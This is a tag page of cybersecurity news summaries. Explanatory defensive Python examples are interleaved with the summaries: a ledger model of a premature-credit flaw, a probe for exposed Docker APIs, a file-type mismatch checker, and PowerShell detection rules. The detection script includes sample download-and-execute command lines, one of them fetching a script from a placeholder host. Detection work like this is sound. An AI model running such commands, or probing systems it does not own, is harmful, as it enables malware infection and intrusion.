Tag: latest cybersecurity news

CDK Global cyberattack impacts thousands of US car dealerships
News

A massive cyberattack has forced CDK Global, a software-as-a-service provider for car dealerships, to shut down its servers, leaving customers unable to run their businesses as usual. CDK Global's SaaS platform serves clients in the auto sector and manages all facets of dealership operations, including inventory management, CRM, financing, payroll, support, and servicing. The company employs thousands of people nationwide, and its platform is used by more than 15,000 auto dealerships in North America. To use CDK's services, dealerships set up an always-on VPN to the provider's data centers, which grants their locally installed applications access to the platform...
New Threat Actor ‘Void Arachne’ Targets Chinese Users with Malicious VPN Installers
News

A never-before-seen threat activity cluster, nicknamed Void Arachne, is targeting Chinese-speaking users with malicious Windows Installer (MSI) files for virtual private networks (VPNs) in order to distribute the Winos 4.0 command-and-control (C&C) framework. The campaign also pushes compromised MSI files bundled with AI voice and facial technology, deepfake pornography-generating software, and nudifiers, according to a technical report released today by Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Ahmed Mohamed Ibrahim. The malware is disseminated via social media, messaging apps, and search engine optimization (SEO) poisoning. According to the security vendor, the attacks also involved promoting well-known programs such as Google Chrome...
UNC3886 Uses Fortinet, VMware 0-Days and Stealth Tactics in Long-Term Spying
News

The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed using multiple persistence mechanisms to maintain unrestricted access to compromised environments. According to a recent analysis by Mandiant researchers, these mechanisms spanned network devices, hypervisors, and virtual machines, ensuring that alternate channels remained available even if the primary layer was detected and removed. The threat actor in question is UNC3886, which the Google-owned threat intelligence firm describes as "sophisticated, cautious, and evasive." The adversary's attacks have exploited zero-day vulnerabilities including CVE-2022-41328 (Fortinet Forti...
Kraken Crypto Exchange Hit by $3 Million Theft Exploiting Zero-Day Flaw
News

The cryptocurrency exchange Kraken disclosed that an unnamed security researcher exploited a "very critical" zero-day vulnerability in its platform to steal $3 million worth of digital assets and has refused to return them. Nick Percoco, Kraken's Chief Security Officer, said on X (formerly Twitter) that the company received a Bug Bounty program notice about a flaw that "allowed them to artificially inflate their balance on our platform"; no further details were provided. The company said it identified the security issue within minutes of receiving the notice: the flaw essentially allowed an attacker to initiate a deposit on the platform and receive funds in their account before the deposit had completed...
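The flaw class described in the notice is crediting a spendable balance when a deposit is initiated rather than when it settles. The following is an added illustrative model, not Kraken's code and not based on any detail beyond the one-sentence description above: a ledger that credits on initiation (so a deposit that never completes still funds a withdrawal) beside one that derives the spendable balance from confirmed deposits only. Class and method names, the `PENDING`/`CONFIRMED`/`FAILED` states and the amounts are all constructed for the example.

```python
from dataclasses import dataclass
from enum import Enum


class DepositState(Enum):
    PENDING = "pending"       # announced by the chain or payment rail, not yet final
    CONFIRMED = "confirmed"   # settled; the funds actually arrived
    FAILED = "failed"         # reversed, re-orged, or never completed


@dataclass
class Deposit:
    amount: int               # minor units (satoshi, cents); never floats for money
    state: DepositState = DepositState.PENDING


class VulnerableLedger:
    """Credits the spendable balance when a deposit is *initiated* (the flaw class)."""

    def __init__(self):
        self.balance = 0

    def initiate_deposit(self, amount):
        d = Deposit(amount)
        self.balance += amount          # credited before settlement
        return d

    def fail(self, d):
        d.state = DepositState.FAILED   # the earlier credit is never reversed

    def withdraw(self, amount):
        if amount > self.balance:
            return False
        self.balance -= amount
        return True


class HardenedLedger:
    """Spendable balance is derived from CONFIRMED deposits only. Pending deposits
    may be displayed but are never spendable, and FAILED never becomes CONFIRMED."""

    def __init__(self):
        self.deposits = []
        self.spent = 0

    def initiate_deposit(self, amount):
        if amount <= 0:
            raise ValueError("deposit amount must be positive")
        d = Deposit(amount)
        self.deposits.append(d)
        return d

    def confirm(self, d):
        if d.state is DepositState.PENDING:
            d.state = DepositState.CONFIRMED

    def fail(self, d):
        if d.state is DepositState.PENDING:
            d.state = DepositState.FAILED

    def available(self):
        settled = sum(d.amount for d in self.deposits
                      if d.state is DepositState.CONFIRMED)
        return settled - self.spent

    def withdraw(self, amount):
        if amount <= 0 or amount > self.available():
            return False
        self.spent += amount
        return True


def demo():
    """Run the same sequence (initiate, withdraw, settle or fail) against both
    ledgers and return the three withdrawal outcomes."""
    v = VulnerableLedger()
    vd = v.initiate_deposit(1_000)
    paid_out_unsettled = v.withdraw(1_000)     # True: funds leave before the deposit settles
    v.fail(vd)                                 # the deposit never completes; money already gone

    h = HardenedLedger()
    hd = h.initiate_deposit(1_000)
    blocked_while_pending = h.withdraw(1_000)  # False: nothing confirmed yet
    h.confirm(hd)
    paid_out_settled = h.withdraw(1_000)       # True only after confirmation
    return paid_out_unsettled, blocked_while_pending, paid_out_settled


if __name__ == "__main__":
    print(demo())
```

In a real exchange the `available()` computation and the `withdraw` decision must run inside one database transaction with the account row locked; otherwise two concurrent withdrawals can each see the same confirmed balance, which is a second, independent way to spend money that is not there.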
ONNX phishing service targets Microsoft 365 accounts at financial firms
News

A new phishing-as-a-service (PhaaS) platform called ONNX Store targets Microsoft 365 accounts belonging to employees of financial institutions using QR codes embedded in PDF attachments. The platform is operated through Telegram bots and includes two-factor authentication (2FA) bypass techniques; it can target both Microsoft 365 and Office 365 email accounts. The activity was discovered by researchers at EclecticIQ, who suspect that ONNX is a rebranded version of the Caffeine phishing kit run by the Arabic-speaking threat actor MRxC0DER. Mandiant first documented Caffeine in October 2022, when the platform was focused on Russian and Chinese platforms rather than Western services...
New Malware Targets Exposed Docker APIs for Cryptocurrency Mining
News

Cybersecurity researchers have discovered a new malware campaign that delivers cryptocurrency miners and other payloads through publicly accessible Docker API endpoints. In a report released last week, cloud analytics platform Datadog said the tools used include a remote access tool capable of downloading and running additional malicious programs, as well as a utility for spreading the malware via SSH. Analysis of the campaign found tactical similarities to Spinning YARN, an earlier campaign that targeted misconfigured Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis services for cryptojacking. The attack begins with the threat actors targeting Docker servers with an exposed port (port 2375) to launch a...
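Port 2375 is the Docker daemon's plain-HTTP listener, which has no authentication of its own: anyone who can reach it can create containers and, through them, the host. The check below is an added example for auditing your own hosts, not code from the Datadog report. It sends `GET /version` (a real, unauthenticated Docker Engine API endpoint) and treats a JSON reply carrying `Version` and `ApiVersion` as an exposed daemon. So that it runs offline, the block also starts a constructed stand-in HTTP server that answers like a misconfigured daemon; the version strings it returns are made up.

```python
import http.client
import json
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

DOCKER_PLAIN_PORT = 2375   # the daemon's unencrypted, unauthenticated TCP listener


def probe_docker_api(host, port=DOCKER_PLAIN_PORT, timeout=3.0):
    """GET /version and decide whether an unauthenticated Docker Engine API is
    answering. Returns (exposed: bool, detail: str)."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/version")
        resp = conn.getresponse()
        status, body = resp.status, resp.read()
        conn.close()
    except (OSError, http.client.HTTPException) as exc:
        return False, f"no Docker API response: {exc}"
    if status != 200:
        return False, f"port open but /version returned HTTP {status}"
    try:
        info = json.loads(body)
    except ValueError:
        return False, "port open but /version body is not JSON"
    if isinstance(info, dict) and "Version" in info and "ApiVersion" in info:
        return True, f"Docker {info['Version']} (API {info['ApiVersion']}) answers without auth"
    return False, "port open but the response does not look like the Docker API"


# Constructed stand-in for a misconfigured daemon so the probe can run offline.
class _FakeDockerDaemon(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/version":
            body = json.dumps({"Version": "24.0.7", "ApiVersion": "1.43"}).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_fake_daemon():
    srv = HTTPServer(("127.0.0.1", 0), _FakeDockerDaemon)   # ephemeral port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Probe the fake daemon, then a port nothing listens on."""
    srv = start_fake_daemon()
    exposed, detail = probe_docker_api("127.0.0.1", srv.server_port)
    srv.shutdown()
    srv.server_close()
    with socket.socket() as s:            # grab and release a free port
        s.bind(("127.0.0.1", 0))
        closed_port = s.getsockname()[1]
    closed, _ = probe_docker_api("127.0.0.1", closed_port)
    return exposed, detail, closed


if __name__ == "__main__":
    print(demo())
```

If the probe reports an exposed daemon on a real host, the fix is not a firewall rule alone: bind the daemon to a Unix socket, or, where remote access is needed, run it with `--tlsverify` and the `--tlscacert`/`--tlscert`/`--tlskey` options on port 2376 so that only clients presenting a certificate signed by your CA can talk to it.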
Cybercriminals Exploit Free Software Lures to Deploy Hijack Loader and Vidar Stealer
News

Threat actors are using free or pirated copies of popular software as lures to trick unsuspecting users into downloading a malware loader called Hijack Loader, which then launches an information stealer named Vidar Stealer. In an analysis published Monday, Trellix security researcher Ale Houspanossian said, "Adversaries had managed to trick users into downloading password-protected archive files containing trojanized copies of a Cisco Webex Meetings App (ptService.exe)." When victims extracted and ran a "Setup.exe" binary, the Cisco Webex Meetings application covertly loaded a malware loader that led to the execution of an information-stealing module. The first stage involves opening a RAR archive file that appears to be an executable named "Setup.exe" but is actua...
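The lure relies on a file whose name says one thing and whose bytes say another: a RAR archive presented as "Setup.exe". A mail gateway or endpoint scanner can catch that class of trick by comparing the extension with the leading magic bytes. The check below is an added example, not part of the Trellix analysis; the signatures are the public ones for PE (`MZ`), RAR 4 and 5, ZIP, 7z and PDF, and the sample headers and filenames are constructed for the demonstration rather than taken from the campaign.

```python
import os

# (type label, leading bytes) from the public file signature tables
SIGNATURES = [
    ("pe",  b"MZ"),                       # Windows executable / DLL
    ("rar", b"Rar!\x1a\x07\x00"),         # RAR 4.x
    ("rar", b"Rar!\x1a\x07\x01\x00"),     # RAR 5.x
    ("zip", b"PK\x03\x04"),
    ("7z",  b"7z\xbc\xaf\x27\x1c"),
    ("pdf", b"%PDF"),
]

# what each extension claims the content is
EXPECTED = {
    ".exe": "pe", ".dll": "pe", ".scr": "pe",
    ".rar": "rar", ".zip": "zip", ".7z": "7z", ".pdf": "pdf",
}


def sniff(header):
    """Type label for the leading bytes, or None if no listed signature matches."""
    for label, magic in SIGNATURES:
        if header.startswith(magic):
            return label
    return None


def check(name, header):
    """Compare the extension's claim with the sniffed content type.
    Returns (verdict, sniffed_type)."""
    ext = os.path.splitext(name)[1].lower()
    actual = sniff(header)
    claimed = EXPECTED.get(ext)
    if claimed is None:
        return "unlisted-extension", actual
    if actual is None:
        return "unknown-content", None
    if actual == claimed:
        return "ok", actual
    return "mismatch", actual


def check_file(path):
    """Read only the first 16 bytes; that covers every signature above."""
    with open(path, "rb") as f:
        return check(path, f.read(16))


def scan_samples():
    # Constructed headers standing in for files on disk; not captured artefacts.
    samples = {
        "Setup.exe":     b"Rar!\x1a\x07\x01\x00" + b"\x00" * 8,   # RAR5 named as an .exe
        "ptService.exe": b"MZ\x90\x00\x03\x00\x00\x00",           # genuine PE header start
        "invoice.pdf":   b"%PDF-1.7\n",
        "update.zip":    b"MZ\x90\x00\x03\x00\x00\x00",           # PE hiding behind .zip
        "notes.txt":     b"hello",
    }
    return {name: check(name, hdr) for name, hdr in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:15s} {verdict}")
```

A "mismatch" verdict is a strong signal on its own (benign software has no reason to ship an archive under an `.exe` name), but note the limits: a password-protected archive still sniffs as an archive, so this check tells you the container lies about itself, not what is inside it.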
Signal Foundation Warns Against EU’s Plan to Scan Private Messages for CSAM
News

Meredith Whittaker, president of the Signal Foundation, which maintains the messaging service of the same name, has warned of the serious risks to end-to-end encryption (E2EE) posed by a contentious European Union proposal to scan users' private messages for child sexual abuse material (CSAM). "Encryption is seriously undermined when private communications need to be scanned in bulk. Full stop," Whittaker said in a statement on Monday. This can happen through various means, such as manipulating an encryption algorithm's random number generation, establishing a key escrow system, or forcing communications through a surveillance system before they are encrypted...
Fake Google Chrome errors trick you into running malicious PowerShell scripts
News

A new malware distribution campaign tricks users into running malicious PowerShell "fixes" that install malware, using fake error messages purporting to come from Word, OneDrive, and Google Chrome. The campaign has been observed in use by several threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and TA571, a threat actor known as a spam distributor that sends enormous volumes of email leading to malware and ransomware infections. Earlier ClearFake attacks used website overlays to trick users into installing fake browser updates that deliver malware. In the new attacks, the threat actors also use JavaScript on compromised websites and HTML attachments...
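Whatever the lure, the user ends up pasting a download-and-execute one-liner into a PowerShell or Run prompt, and that command line lands in process-creation or script-block logs. The triage below is an added example, not from the campaign write-up: it scores command lines against generic indicators (execution-policy bypass, hidden window, `iex`, web download cmdlets, an encoded command, clipboard read) and flags lines that hit two or more. The indicator list is a heuristic the author of this example chose, not campaign IOCs, and the four sample command lines are constructed, with `update.invalid` as a placeholder host.

```python
import re

# Generic download-and-execute indicators. Heuristics, not IOCs; tune to your fleet.
INDICATORS = [
    ("exec-policy-bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("hidden-window",      re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("invoke-expression",  re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("web-download",       re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)),
    ("encoded-command",    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("clipboard-read",     re.compile(r"\bget-clipboard\b", re.I)),
]


def score(cmdline):
    """Names of every indicator present in one command line, in table order."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def is_suspicious(cmdline, threshold=2):
    """Two independent indicators on one line is rare in legitimate admin use."""
    return len(score(cmdline)) >= threshold


# Constructed process command lines, not captured telemetry. The first and third
# are shaped like a pasted "fix"; the second is ordinary admin work.
SAMPLE_CMDLINES = [
    'powershell -w hidden -ep bypass -c "iex (iwr http://update.invalid/fix.ps1)"',
    "powershell Get-Process | Where-Object CPU -gt 10",
    'powershell.exe -NoProfile -Command "Get-Clipboard | iex"',
    "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]


def triage(cmdlines=SAMPLE_CMDLINES, threshold=2):
    """Return (cmdline, indicators) for every line meeting the threshold."""
    return [(c, score(c)) for c in cmdlines if is_suspicious(c, threshold)]


if __name__ == "__main__":
    for cmd, hits in triage():
        print(f"{', '.join(hits):55s} {cmd}")
```

The fourth sample (an encoded command with nothing else) scores one and is not flagged at the default threshold; whether a bare `-enc` deserves a higher weight is a tuning decision for your environment, since some management tooling uses it legitimately. Pair the command-line score with the parent process: a `powershell.exe` spawned by `explorer.exe` from the Run dialog, with the clipboard as its only input, is the shape this campaign produces.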
UK Man Suspected of Being ‘Scattered Spider’ Leader Arrested
News

A 22-year-old British man was recently arrested in Spain on suspicion of being a leader of the notorious Scattered Spider cybercrime group. On June 14, the Spanish news outlet Murcia Today reported that an unnamed British man had been arrested in Palma de Mallorca while attempting to board a flight to Italy. The arrest was the result of cooperation between the FBI and Spanish police. In May, the FBI announced that it was seeking to charge members of Scattered Spider, whose members are thought to be mostly from the US and other Western countries, with a small number from eastern Europe. A 19-year-old from Florida alleged to be one of the group's members was arrested in January. S...